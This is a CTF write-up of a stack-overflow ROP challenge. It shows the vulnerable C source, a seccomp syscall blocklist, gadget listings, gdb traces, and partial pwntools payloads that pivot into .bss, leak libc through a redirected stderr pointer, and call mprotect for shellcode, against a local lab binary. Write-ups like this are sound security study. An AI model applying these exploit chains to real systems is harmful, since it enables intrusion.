⍉ collection of ROP writeups

# recommended listening - at the drive in - enfilade

Over the past month or so I've done a few interesting stack challenges written by locals. They're all similar, so I've opted to group all the solutions into one post. All of the solutions I arrived at were unintended and significantly more painful and time consuming to execute than the typical routes, taking me upwards a few hours to successfully pull off. These are not easy ROP solutions. and as such, these writeups will be for more advanced players who are already familiar with existing ROP techniques (such as add gadgets, stack pivoting, SROP, etcetera.)

On some level I do believe approaching these challenges in this manner is an exercise in pain, not unlike that shit they did in the movie Martyrs. But much like Martyrs there is an eventual transcendent state acquired when a shell is popped, also. What I am trying to articulate here is that my life is, indeed, exactly like Martyrs, and the computer is a Pain Cube (a Cube of Pain for my Mind).

Anyways onto Pain Cube number one.


blahaj25: ret2what by FS

tldr if you hate me - spray libc addresses to get rbx control, use add rbp ; rbx gad to increment stderr to stdout, use fwrite to leak libc, win
   3   int main()
   4   {
   5   │   char buf[0x100];
   6   │   char s[] = "Have you heard of 'Don't Tap the Glass'?\n";
   7   │   int n = 10;
   8   │   taunt();
   9   │   seccomp_();
  10   │   memset(s, (short)n, n);
  11   │   fgets(buf, 0x150, stdin);
  12   │   return 0;
  13   }
The vulnerability is immediate - the program reads 0x150 bytes into an 0x100 sized buffer allocated on the stack. However, the challenge is made more complicated by a host of random bullshit, the most meaningful ones being seccomp hardenings and some weird forking behavior in the taunt function:
  16   void taunt()
  17   {
  18   │   pid_t pid = fork();
  19   │   if (pid == 0)
  20   │   {
  21   │     execl("./test", "test", (char *)NULL);
  22   │     perror("execl failed");
  23   │  }
  24   }
The test program reads the flag into an mmap'd region of memory, waits until a specific byte in that region is changed, and then prints out the flag. Due to the seccomp hardenings which block any conventional shell-popping or ORW related syscalls, this child process is the only place we can read the flag.

Our plan of attack for this challenge, due to the lack of gadgets, is to spray a libc pointer into bss and increment it using an add gadget. Doing this requires a stack pivot - both techniques (add gadgets, pivoting) are common for this sort of challenge.

We can very easily get arbitrary write to anywhere in the binary due to two things: our ability to control rbp on each function epilogue, and the fact that fgets is always called on an address relative to rbp, as evidenced by the disassembly below.
  40149c:	48 8b 15 dd 2b 00 00 	mov    rdx,QWORD PTR [rip+0x2bdd]        # 404080 <stdin@GLIBC_2.2.5>
  4014a3:	48 8d 85 f0 fe ff ff 	lea    rax,[rbp-0x110]
  4014aa:	be 50 01 00 00       	mov    esi,0x150
  4014af:	48 89 c7             	mov    rdi,rax
  4014b2:	e8 c9 fb ff ff       	call   401080 <fgets@plt>
  4014b7:	b8 00 00 00 00       	mov    eax,0x0
  4014bc:	c9                   	leave
  4014bd:	c3                   	ret
A few simple calls will enable us to pivot into .bss and control rbp to write wherever we want.
   10   payload += p64(0x404500) # saved rbp
    9   payload += p64(READ)
    8   payload += p64(LEAVE)
    7   p.sendline(payload)
    6   
    5   payload = b'B' * 0x110
    4   payload += p64(0x404f60)
    3   payload += p64(READ)
    2   time.sleep(0.1)
    1   p.sendline(payload)
(READ here is an address that points directly to the fgets call, after the function prologue).

The issue with our add gadget plan is that add gadgets require rbx control, which no existing gadget within the binary offers. Just to elucidate, we can peek at how useless the existing gadgets within the binary are with ROPgadget.
(base) wrenches@kitty (~/work/pwn/ret2what) > ROPgadget --binary=chall --nojop
Gadgets information
============================================================
0x00000000004013c8 : add al, ch ; ret 0xfffc
0x000000000040113b : add bh, bh ; loopne 0x4011a5 ; nop ; ret
0x00000000004013c6 : add byte ptr [rax], al ; add al, ch ; ret 0xfffc
0x00000000004014b8 : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x0000000000401108 : add byte ptr [rax], al ; add byte ptr [rax], al ; nop dword ptr [rax] ; ret
0x00000000004014b9 : add byte ptr [rax], al ; add cl, cl ; ret
0x00000000004011aa : add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x00000000004014ba : add byte ptr [rax], al ; leave ; ret
0x000000000040110a : add byte ptr [rax], al ; nop dword ptr [rax] ; ret
0x00000000004011ab : add byte ptr [rcx], al ; pop rbp ; ret
0x00000000004011a9 : add byte ptr cs:[rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x00000000004014bb : add cl, cl ; ret
0x000000000040113a : add dil, dil ; loopne 0x4011a5 ; nop ; ret
0x00000000004011ac : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x00000000004011a7 : add eax, 0x2efb ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401013 : add esp, 8 ; ret
0x0000000000401012 : add rsp, 8 ; ret
0x0000000000401204 : leave ; ret
0x000000000040113d : loopne 0x4011a5 ; nop ; ret
0x00000000004011a6 : mov byte ptr [rip + 0x2efb], 1 ; pop rbp ; ret
0x00000000004014b7 : mov eax, 0 ; leave ; ret
0x0000000000401203 : nop ; leave ; ret
0x000000000040113f : nop ; ret
0x000000000040110c : nop dword ptr [rax] ; ret
0x00000000004011ad : pop rbp ; ret
0x0000000000401138 : push -0xffbfc0 ; loopne 0x4011a5 ; nop ; ret
0x0000000000401016 : ret
0x0000000000401042 : ret 0x2f
0x00000000004013ca : ret 0xfffc
0x0000000000401022 : retf 0x2f
0x0000000000401242 : retf 0xd
0x000000000040100d : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x00000000004011a8 : sti ; add byte ptr cs:[rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x00000000004014c1 : sub esp, 8 ; add rsp, 8 ; ret
0x00000000004014c0 : sub rsp, 8 ; add rsp, 8 ; ret

Unique gadgets found: 35
Whole lot of nonsense. Only pop gadget is pop rbp, only useful gadget is our add gadget (add dword ptr [rbp - 0x3d], ebx ; nop ; ret). Honestly I am still surprised there is nothing of note here despite how much stuff the binary is doing, but oh well.

Eventually, we find our gadget in an unlikely place - the seccomp_() call. Here is the full function code.
  54   void seccomp_()
  53   {
  52   │   int rc;
  51   │   scmp_filter_ctx ctx;
  50   │   char *boohoo = ":(";
  49   │   char *stra = "Load Failed %s\n";
  48   │   ctx = seccomp_init(SCMP_ACT_ALLOW);
  47   │   if (ctx == NULL)
  46   │   {
  45   │     perror("seccomp_init");
  44   │     exit(1);
  43   │  }
  42   │ 
  41   │  int blocked_syscalls[] = {
  40   │     SCMP_SYS(pread64),
  39   │     SCMP_SYS(readv),
  38   │     SCMP_SYS(execve),
  37   │     SCMP_SYS(readlink),
  36   │     SCMP_SYS(readahead),
  35   │     SCMP_SYS(readlinkat),
  34   │     SCMP_SYS(preadv),
  33   │     SCMP_SYS(openat),
  32   │     SCMP_SYS(openat2),
  31   │     SCMP_SYS(open),
  30   │     SCMP_SYS(creat),
  29   │     SCMP_SYS(sendfile),
  28   │     SCMP_SYS(fork),
  27   │     SCMP_SYS(execveat),
  26   │     SCMP_SYS(sendfile),
  25   │     SCMP_SYS(preadv2),
  24   │  };
  23   │ 
  22   │  for (size_t i = 0; i < sizeof(blocked_syscalls) / sizeof(blocked_syscalls[0]); i++)
  21   │  {
  20   │     rc = seccomp_rule_add(ctx, SCMP_ACT_KILL_PROCESS, blocked_syscalls[i], 0);
  19   │     if (rc < 0)
  18   │     {
  17   │       fprintf(stderr, "Failed to block syscall %d\n", blocked_syscalls[i]);
  16   │       seccomp_release(ctx);
  15   │       exit(1);
  14   │    }
  13   │  }
  12   │  rc = seccomp_load(ctx);
  11   │  if (rc < 0)
  10   │  {
   9   │     perror("seccomp_load");
   8   │     fprintf(stderr, stra, boohoo);
   7   │     seccomp_release(ctx);
   6   │     cleanUp();
   5   │  }
   4   │ 
   3   │  seccomp_release(ctx);
   2   }
A brief aside. When exploiting difficult ROP problems of this nature, the exploit developer must, ultimately, stop looking outwards and instead focus his energy inwards. Perhaps five different tmux terminals, gdb instances, nvim split windows are running concurrently, and the exploit developer has devoted an equal amount of focus on each. This is the wrong approach.

At this juncture, a solution can only be attained by spiritual means. Focus yourself. Look inwards. Look into your heart. Is it pure? Are you kind of heart? Do the registers love you? Do you love yourself? If you have cleansed your soul in the water of God, only then will He answer. Only then will the registers command themselves to your touch, individual follicles winnowing along to His feather in a synchronous beat. Like knives through smoke.

Anyways, the wisdom of God makes itself apparent in the seccomp_release() function. The seccomp_release() function triggers a series of libc function calls which includes _int_free_merge_chunk and _int_free_create_chunk.
    0x7f5fc647444d e84ec70700            <_int_free_maybe_consolidate.part.0+0x46d>   call   0x7f5fc64f0ba0 <__stack_chk_fail>
    0x7f5fc6474452 66662e0f1f84000000..  <NO_SYMBOL>   data16 cs nop WORD PTR [rax+rax*1+0x0]
    0x7f5fc647445d 0f1f00                <NO_SYMBOL>   nop    DWORD PTR [rax]
*-> 0x7f5fc6474460 4156                  <_int_free_merge_chunk>   push   r14
    0x7f5fc6474462 4155                  <_int_free_merge_chunk+0x2>   push   r13
    0x7f5fc6474464 4c8d2c16              <_int_free_merge_chunk+0x4>   lea    r13, [rsi + rdx * 1]
    0x7f5fc6474468 4154                  <_int_free_merge_chunk+0x8>   push   r12
    0x7f5fc647446a 55                    <_int_free_merge_chunk+0xa>   push   rbp
    0x7f5fc647446b 53                    <_int_free_merge_chunk+0xb>   push   rbx
----------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:944135] Name: "chall_patched", stopped at 0x7f5fc6474460 <_int_free_merge_chunk>, reason: BREAKPOINT
------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f5fc6474460 <_int_free_merge_chunk>
[ #1] 0x7f5fc64746c6 <_int_free_chunk+0x126>
[ #2] 0x7f5fc64773c0 <free+0x180> (frame name: _int_free)
[ #3] 0x7f5fc64773c0 <free+0x180> (frame name: __GI___libc_free)
[ #4] 0x7f5fc65d3730 <NO_SYMBOL>
[ #5] 0x7f5fc65d3781 <NO_SYMBOL>
[ #6] 0x7f5fc65d37cd <NO_SYMBOL>
[ #7] 0x0000004013f0 <seccomp_+0x19f>
[ #8] 0x00000040147f <main+0x8c>
[ #9] 0x00000000000a <NO_SYMBOL>
[...]
------------------------------------------------------------------------------------------------------------------------------
gef> 
When _int_free_create_chunk is called from _int_free_merge_chunk, it is done so at a very specific offset near the function epilogue, which pushes a return address on the stack that we can use as as an rbx control gadget.
   0x7f5fc64744f3 <_int_free_merge_chunk+147>:	call   0x7f5fc6473040 <_int_free_create_chunk>
   0x7f5fc64744f8 <_int_free_merge_chunk+152>:	cmp    rax,0xffff
   0x7f5fc64744fe <_int_free_merge_chunk+158>:	ja     0x7f5fc6474510 <_int_free_merge_chunk+176>
   0x7f5fc6474500 <_int_free_merge_chunk+160>:	pop    rbx
   0x7f5fc6474501 <_int_free_merge_chunk+161>:	pop    rbp
   0x7f5fc6474502 <_int_free_merge_chunk+162>:	pop    r12
   0x7f5fc6474504 <_int_free_merge_chunk+164>:	pop    r13
   0x7f5fc6474506 <_int_free_merge_chunk+166>:	pop    r14
   0x7f5fc6474508 <_int_free_merge_chunk+168>:	ret
We can see that after calling main with our stack pivoted to .bss, this rbx control gadget (_int_free_merge_chunk+152) would be placed on the stack for us to freely return to. There is a cmp rax, 0xffff here but this is, thankfully, irrelevant. We can control our writes and write our needed values of rbx below the region of .bss where this return address happens to land, and then use a leave ; ret to pivot rsp on top of that gadget. Below is a list of all libc pointers sprayed onto .bss once we stack pivot and return to main:
chall_patched: 0x0000000000404208  ->  0x00007f5fc64760bc <_int_malloc+0xe1c>  ->  0xf7e3e908244c8b48
chall_patched: 0x0000000000404240  ->  0x00007f5fc65bbac0 <main_arena>  ->  0x0000000000000000
chall_patched: 0x00000000004042b8  ->  0x00007f5fc64773c0 <free+0x180>  ->  0x0000441f0f66d6eb
chall_patched: 0x0000000000404428  ->  0x00007f5fc65b9fd0 <_IO_file_jumps>  ->  0x0000000000000000
chall_patched: 0x0000000000404468  ->  0x00007f5fc6453947 <_IO_getline_info+0x127>  ->  0x048d490824448b4c
chall_patched: 0x00000000004044c8  ->  0x00007f5fc645270a <fgets+0x9a>  ->  0xc08548db3100558b
chall_patched: 0x0000000000404ca8  ->  0x00007f5fc64730cd <_int_free_create_chunk+0x8d>  ->  0xd801480824448b48
chall_patched: 0x0000000000404cd8  ->  0x00007f5fc64744f8 <_int_free_merge_chunk+0x98>  ->  0x10770000ffff3d48
chall_patched: 0x0000000000404d28  ->  0x00007f5fc64773c0 <free+0x180>  ->  0x0000441f0f66d6eb
Note our gadget of interest at 0x404cd8 in the binary. Yay!

We can view the region of memory below that saved return address. As it stands, there is a lot of garbage that we will need to eventually overwrite, because as it stands, if we use this gadget with these garbage values, we will not only fill our registers with junk, but we'll also eventually return to a junk address.
      0x000000404cd8|+0x0008|+001: 0x00007fee59d3d4f8 <_int_free_merge_chunk+0x98>  ->  0x10770000ffff3d48
      0x000000404ce0|+0x0010|+002: 0xc9202d3bcede358c
      0x000000404ce8|+0x0018|+003: 0x000000000e548700  ->  0x0000000000000001
$rsp  0x000000404cf0|+0x0020|+004: 0x00007fee59e848e0 <_IO_2_1_stdin_>  ->  0x00000000fbad2088  <-  $r15
      0x000000404cf8|+0x0028|+005: 0x00007fee59d2c6ad <__syscall_cancel+0xd>  ->  0xf0003dd06348595a  <-  retaddr[1]
      0x000000404d00|+0x0030|+006: 0x0000000000000000
      0x000000404d08|+0x0038|+007: 0x000000000e54b540  ->  0x0000000000000000
      0x000000404d10|+0x0040|+008: 0xffffffffffffff88
      0x000000404d18|+0x0048|+009: 0x00007fee59da0ea6 <read+0x16>  ->  0x441f0fc318c48348  <-  retaddr[2]
      0x000000404d20|+0x0050|+010: 0x0000000000000000
Anyways, what do we do after we get rbx control? Typically, we just use rbx to increment some libc address to a one-gadget and win, but one-gadgets will not work due to seccomp. Indeed, the challenge requires us to eventually mprotect a RWX page and write some shellcode leveraging some arcane syscalls to leak the flag from the child process. This is practically impossible to do without help from our good buddy libc, so a libc leak should be our next target here.

seccomp_() once again comes to our rescue. There is a call to fwrite with stderr as an argument in a conditional branch. The challenge author's intended solution is to use ret2dlresolve to convert this fwrite call into an mprotect call, but the Mandate of Heaven is not awarded to people who use ret2dlresolve, so we can use another trick instead.

We first look at the C code, and the compiled assembly of this conditional branch.
  11   │  if (rc < 0)
  10   │  {
   9   │     perror("seccomp_load");
   8   │     fprintf(stderr, stra, boohoo);
   7   │     seccomp_release(ctx);
   6   │     cleanUp();
   5   │  }
Note that the fprintf call is invoked on two stack variables. The compiled assembly loads the address of stderr from an area within the binary, while also loading the other two variables from an address relative to rbp.
  4013af:	48 8b 05 ea 2c 00 00 	mov    rax,QWORD PTR [rip+0x2cea]        # 4040a0 <stderr@GLIBC_2.2.5>
  4013b6:	48 8b 55 f0          	mov    rdx,QWORD PTR [rbp-0x10]
  4013ba:	48 8b 4d e8          	mov    rcx,QWORD PTR [rbp-0x18]
  4013be:	48 89 ce             	mov    rsi,rcx
  4013c1:	48 89 c7             	mov    rdi,rax
  4013c4:	b8 00 00 00 00       	mov    eax,0x0
  4013c9:	e8 c2 fc ff ff       	call   401090 <fprintf@plt>
  4013ce:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
  4013d2:	48 89 c7             	mov    rdi,rax
  4013d5:	e8 86 fc ff ff       	call   401060 <seccomp_release@plt>
  4013da:	b8 00 00 00 00       	mov    eax,0x0
  4013df:	e8 e2 fd ff ff       	call   4011c6 <cleanUp>
  4013e4:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
  4013e8:	48 89 c7             	mov    rdi,rax
  4013eb:	e8 70 fc ff ff       	call   401060 <seccomp_release@plt>
  4013f0:	90                   	nop
  4013f1:	c9                   	leave
  4013f2:	c3                   	ret
(Note, importantly, that the stderr stream is closed on remote.) We can leverage this fprintf call to get leaks. We simply point rbp towards some area that has a libc address (which we will have plenty of, because we would have sprayed .bss with libc return addresses by now), and use our add rbx gadget to increment the stored stderr address into the binary to instead point to stdout.

Unfortunately, a lot of care is required here. The fact that all the functions within this snippet (including seccomp_release, which we have to ensure does not segfault) load stack-relative variables is both a gift and a curse: we can control them to whatever we want, but controlling them is quite fucking annoying. We can hijack one of our previous writes (by now, we will have done around like, four or so) filling the 0x100 sized buffer by preparing our needed stack variables.
   24   payload = b'E' * 0x110
   23   payload += p64(0x404ce0 + 0x110)
   22   payload += p64(READ)
   21   payload += p64(0) # 0x404310, [rbp - 0x20], null ptr for seccomp release
   20   payload += p64(0x404328) # [rbp - 0x18], ptr to string
   19   payload += p64(elf.sym['stderr'])
   18   payload += b'leak: %s'
   17   time.sleep(0.1)
   16   p.sendline(payload)
   15   
   14   print('[!] _int_free_merge_chunk gadget')
   13   payload = p64(libc.sym['_IO_2_1_stdout_'] - libc.sym['_IO_2_1_stderr_'])    # RBX
   12   payload += p64(elf.sym['stderr'] + 0x3d)
   11   payload += p64(12)  # R12
   10   payload += p64(13)  # R13
    9   payload += p64(14)  # R14
    8   payload += p64(ADD)
    7   payload += p64(POP_RBP) + p64(0x404310 + 0x20)
    6   payload += p64(FWRITE)
    5   payload += cyclic(0x110 - len(payload))
    4   payload += p64(0x404cd0) + p64(LEAVE)
    3   time.sleep(0.1)
    2   p.sendline(payload)
Note the weird 'juggling' we're doing with these two writes. The first write prepares our saved "stack" variables while also preparing rbp and the saved retaddr to point below our saved _int_free_merge_chunk gadget for rbx control, and then the second gadget prepares the values below the whole chain executed after _int_free_merge_chunk (complete with the stored registers, rbp change, add gadget to point stderr into stdout, and then eventually call fwrite). Additionally, within that same write, we overwrite that call's saved rbp to point above our gadget for our leave call.

We can carefully look at each step as it is executed.
$r15: 0x0000000000403df0 <__do_global_dtors_aux_fini_array_entry>  ->  0x0000000000401190 <__do_global_dtors_aux>  ->  0x2f0d3d80fa1e0ff3
$fs_base: 0x00007f7e5bdf0740  ->  [loop detected]
$gs_base: 0x0000000000000000
$eflags: 0x293 [ident align vx86 resume nested overflow direction INTERRUPT trap SIGN zero ADJUST parity CARRY] [Ring=3]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
-------------------------------------------------------------------------------------------------------------------------------------------------- stack ----
$rsp  0x000000404ce0|+0x0000|+000: 0x00000000000000e0
      0x000000404ce8|+0x0008|+001: 0x00000000004040dd  ->  0x0000000000000000
      0x000000404cf0|+0x0010|+002: 0x000000000000000c
      0x000000404cf8|+0x0018|+003: 0x000000000000000d
      0x000000404d00|+0x0020|+004: 0x000000000000000e
      0x000000404d08|+0x0028|+005: 0x00000000004011ac <__do_global_dtors_aux+0x1c>  ->  0x2e6666c390c35d01  <-  retaddr[1]
      0x000000404d10|+0x0030|+006: 0x00000000004011ad <__do_global_dtors_aux+0x1d>  ->  0x0f2e6666c390c35d  <-  retaddr[2]
      0x000000404d18|+0x0038|+007: 0x0000000000404330  ->  0x000000000040000a  ->  0x0000000000000000  <-  retaddr[3]
------------------------------------------------------------------------------------------------------------------------------ code: x86:64 (gdb-native) ----
    0x7f7e5be934f3 e848ebffff            <_int_free_merge_chunk+0x93>   call   0x7f7e5be92040 <_int_free_create_chunk>
    0x7f7e5be934f8 483dffff0000          <_int_free_merge_chunk+0x98>   cmp    rax, 0xffff
    0x7f7e5be934fe 7710                  <_int_free_merge_chunk+0x9e>   ja     0x7f7e5be93510 <_int_free_merge_chunk+176>
 -> 0x7f7e5be93500 5b                    <_int_free_merge_chunk+0xa0>   pop    rbx
    0x7f7e5be93501 5d                    <_int_free_merge_chunk+0xa1>   pop    rbp
    0x7f7e5be93502 415c                  <_int_free_merge_chunk+0xa2>   pop    r12
    0x7f7e5be93504 415d                  <_int_free_merge_chunk+0xa4>   pop    r13
    0x7f7e5be93506 415e                  <_int_free_merge_chunk+0xa6>   pop    r14
First, our hijacked _int_free_merge_chunk gadget. We can see all the prepared register values on the stack, as intended.
-------------------------------------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x7f7e5be93502 415c                  <_int_free_merge_chunk+0xa2>   pop    r12
    0x7f7e5be93504 415d                  <_int_free_merge_chunk+0xa4>   pop    r13
    0x7f7e5be93506 415e                  <_int_free_merge_chunk+0xa6>   pop    r14
 -> 0x7f7e5be93508 c3                    <_int_free_merge_chunk+0xa8>   ret   

   -> 0x4011ac 015dc3                <__do_global_dtors_aux+0x1c>   add    DWORD PTR [rbp - 0x3d], ebx
      0x4011af 90                    <__do_global_dtors_aux+0x1f>   nop   
      0x4011b0 c3                    <__do_global_dtors_aux+0x20>   ret   
      0x4011b1 66662e0f1f84000000..  <__do_global_dtors_aux+0x21>   data16 cs nop WORD PTR [rax + rax * 1 + 0x0]
      0x4011bc 0f1f4000              <__do_global_dtors_aux+0x2c>   nop    DWORD PTR [rax + 0x0]
      0x4011c0 f30f1efa              <frame_dummy>   endbr64

    0x7f7e5be93509 0f1f8000000000        <_int_free_merge_chunk+0xa9>   nop    DWORD PTR [rax + 0x0]
    0x7f7e5be93510 5b                    <_int_free_merge_chunk+0xb0>   pop    rbx
    0x7f7e5be93511 4889ef                <_int_free_merge_chunk+0xb1>   mov    rdi, rbp
    0x7f7e5be93514 5d                    <_int_free_merge_chunk+0xb4>   pop    rbp
    0x7f7e5be93515 415c                  <_int_free_merge_chunk+0xb5>   pop    r12
-------------------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:965899] Name: "chall_patched", stopped at 0x7f7e5be93508 <_int_free_merge_chunk+0xa8>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f7e5be93508 <_int_free_merge_chunk+0xa8>
[ #1] 0x0000004011ac <__do_global_dtors_aux+0x1c>
Then, our eventual return to the add gadget, which points stderr to stdout.
-------------------------------------------------------------------------------------------------------------- arguments (guessed) ----
0x401090 <fprintf@plt> (
   $rdi = 0x00007ff0e79445c0 <_IO_2_1_stdout_>  ->  0x00000000fbad2084,
   $rsi = 0x0000000000404328  ->  0x7325203a6b61656c 'leak: %s\n',
   $rdx = 0x00000000004040a0 <stderr@GLIBC_2.2.5>  ->  0x00007ff0e79445c0 <_IO_2_1_stdout_>  ->  0x00000000fbad2084,
   $rcx = 0x0000000000404328  ->  0x7325203a6b61656c 'leak: %s\n',
   $r8 = 0x00000000095c5f71  ->  0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]',
   $r9 = 0x0000000000000000,
)
-------------------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:973820] Name: "chall_patched", stopped at 0x0000004013c9 <seccomp_+0x178>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x0000004013c9 <seccomp_+0x178>
[ #1] 0x0000095c8530 <NO_SYMBOL>
[ #2] 0x000000000000 <NO_SYMBOL>
---------------------------------------------------------------------------------------------------------------------------------------
gef> 
And our eventual fprintf call, with our carefully prepared stack-relative variables. Yay!.

The final part of this challenge, once we get our leaks, is overcoming the utter nonsense that is the forked child process stuff. This is honestly better detailed in Nikola's writeup, and personally, I don't find it as interesting - it is functionally just writing shellcode after we get an mprotect call after our libc leak. With that in mind, I'm not going to go in depth (and this means the writeup will basically end here).

Let's just go over the mprotect section. We just need to prepare a simple ROP chain to call mprotect. A small complication is that we don't have enough space after the buffer to write our chain, so we just write it inside the buffer and then hijack RIP to point to a leave ; ret which puts us inside the buffer.
   14   payload = b'A' * 0x7
   13   payload += p64(POP_RDI) + p64(0x404000)
   12   payload += p64(POP_RDX_POP_RBX) + p64(0x07) + p64(0)
   11   payload += p64(POP_RSI) + p64(0x1000)
   10   payload += p64(libc.sym['__GI_mprotect'])
    9   payload += p64(POP_RBP) + p64(0x404800)
    8   payload += p64(READ)
    7   payload += b'A' * (0x10f - len(payload))
    6   payload += p64(0x404500 - 0x110)
    5   payload += p64(LEAVE)
    4   time.sleep(0.1)
    3   p.sendline(payload)
Executing successfully in a debugger, we can see the mprotect call be made:
    0x7f934733962d 7301                  <mprotect+0xd>   jae    0x7f9347339630 <__GI_mprotect+0x10>
    0x7f934733962f c3                    <mprotect+0xf>   ret   
    0x7f9347339630 488b0da1970d00        <mprotect+0x10>   mov    rcx, QWORD PTR [rip + 0xd97a1] # 0x7f9347412dd8
    0x7f9347339637 f7d8                  <mprotect+0x17>   neg    eax
------------------------------------------------------------------------------------------------------------------------ arguments ----
[+] Detected syscall (arch:X86, mode:64)
    mprotect(unsigned long start, size_t len, unsigned long prot)
[+] Parameter            Register             Value
    RET                  $rax                 -
    NR                   $rax                 0xa
    start                $rdi                 0x0000000000404000 <seccomp_init@got[plt]>  ->  0x00007f9347425730 <seccomp_init>  ->  0x
9a0a058bfa1e0ff3
Afterwards, we simply call another read() to read our shellcode into the newly rwx .BSS region and win. :)
[+] Detected syscall (arch:X86, mode:64)
    read(unsigned int fd, char __user *buf, size_t count)
[+] Parameter            Register             Value
    RET                  $rax                 -
    NR                   $rax                 0x0
    fd                   $rdi                 0x0000000000000000
    buf                  $rsi                 0x0000000000404100  ->  0x0000000000000000
    count                $rdx                 0x0000000000000f00
-------------------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1030914] Name: "chall_patched", stopped at 0x7f934733e038 <getsockopt+0x8>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f934733e038 <getsockopt+0x8> (frame name: getsockopt_syscall)
[ #1] 0x7f934733e038 <getsockopt+0x8> (frame name: __getsockopt)
[ #2] 0x000000404100 <NO_SYMBOL>
In summary, what we've done so far:
  1. Stack pivoted to .bss.
  2. Called the main function again, to spray libc pointers into .bss, thereby gaining rbx control.
  3. Prepared the stack frame beneath the _int_free_merge_chunk gadget.
  4. Used rbx control and an add gadget to point the stored stderr pointer in the binary to instead point to stdout.
  5. Called fwrite with rbp relative variables to leak libc through stdout instead of stderr (because it's closed).
  6. Used the libc leak to write an mprotect call to create an rwx page.
  7. Wrote shellcode to win! :)
[+] Opening connection to 172.17.0.2 on port 8000: Done
[!] ret2main
[!] _int_free_merge_chunk gadget
hex(libc.address) = '0x7f1b62a80000'
[!] mprotect payload
[!] read payload
[!] send shellcode
[*] Switching to interactive mode
blahaj{fake_flag}
\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\xa0\xd65\x10\xfe\x7f\x00\x00\xfb\x80\x83\x83\x0f\x7f\x00\x00[*] Got EOF while
reading in interactive
$  

concluding remarks

I'd like to thank FS for helping restore my long-dormant Catholicism with this challenge. This challenge took me around 7(?) hours to solve, and most of the beginning was spent chasing down a really interesting exploitation path that ends up almost working.

When fgets() is called, it calls a lot of different helper functions, and the actual 'read' (bytes being written into our buffer) happens a few function calls in. If we position rsp and rbp very, very delicately, we can end up clobbering the return addresses of internal libc functions (as well as any registers they may have pushed onto the stack).

    0x401492 89ce                  <main+0x9f>   mov    esi, ecx
    0x401494 4889c7                <main+0xa1>   mov    rdi, rax
    0x401497 e8d4fbffff            <main+0xa4>   call   0x401070 <memset@plt>
 -> 0x40149c 488b15dd2b0000        <main+0xa9>   mov    rdx, QWORD PTR [rip + 0x2bdd] # 0x404080 <stdin@GLIBC_2.2.5>
    0x4014a3 488d85f0feffff        <main+0xb0>   lea    rax, [rbp - 0x110]
    0x4014aa be50010000            <main+0xb7>   mov    esi, 0x150
    0x4014af 4889c7                <main+0xbc>   mov    rdi, rax
    0x4014b2 e8c9fbffff            <main+0xbf>   call   0x401080 <fgets@plt>
    0x4014b7 b800000000            <main+0xc4>   mov    eax, 0x0
----------------------------------- memory access: $rip+0x2bdd = 0x404080 ----
      0x000000404080|+0x0000|+000: 0x00007f99c6d488e0 <_IO_2_1_stdin_>  ->  0x00000000fbad2088
      0x000000404088|+0x0008|+001: 0x0000000000000000
      0x000000404090|+0x0010|+002: 0x0000000000000000
      0x000000404098|+0x0018|+003: 0x0000000000000000
----------------------------------------------------------------- threads ----
[*Thread Id:1, tid:1452864] Name: "chall_patched", stopped at 0x00000040149c <main+0xa9>, reason: SINGLE STEP
------------------------------------------------------------------- trace ----
[*#0] 0x00000040149c <main+0xa9>
[ #1] 0x000000000000 <NO_SYMBOL>
------------------------------------------------------------------------------
gef> p $rsp
$8 = (void *) 0x404f10
gef> p $rbp
$9 = (void *) 0x404f80
gef> 
Here, I have set up rsp and rbp to fulfill this exact scenario. Note how close they are, a mere 0x70 bytes away. When fgets calls its resultant functions, saved registers and return addresses will be stored near these memory spaces on the stack, and it just so happens that when we perform our write to [rbp - 0x110], we will whack those values.
------------------------------------------------------------------------------------------------------------------------------ code: x86:64 (gdb-native) ----
    0x7f99c6bf0678 0f1f840000000000      <__internal_syscall_cancel+0x58>   nop    DWORD PTR [rax+rax*1+0x0]
    0x7f99c6bf0680 488b442410            <__internal_syscall_cancel+0x60>   mov    rax, QWORD PTR [rsp+0x10]
    0x7f99c6bf0685 0f05                  <__internal_syscall_cancel+0x65>   syscall
 -> 0x7f99c6bf0687 5b                    <__internal_syscall_cancel+0x67>   pop    rbx
    0x7f99c6bf0688 c3                    <__internal_syscall_cancel+0x68>   ret   
    0x7f99c6bf0689 0f1f8000000000        <__internal_syscall_cancel+0x69>   nop    DWORD PTR [rax + 0x0]
    0x7f99c6bf0690 83e239                <__internal_syscall_cancel+0x70>   and    edx, 0x39
    0x7f99c6bf0693 83fa08                <__internal_syscall_cancel+0x73>   cmp    edx, 0x8
    0x7f99c6bf0696 75de                  <__internal_syscall_cancel+0x76>   jne    0x7f99c6bf0676 <__internal_syscall_cancel+0x56>
------------------------------------------------------------------------------------------------------------------------------------------------ threads ----
[*Thread Id:1, tid:1452864] Name: "chall_patched", stopped at 0x7f99c6bf0687 <__internal_syscall_cancel+0x67>, reason: SIGINT
-------------------------------------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f99c6bf0687 <__internal_syscall_cancel+0x67>
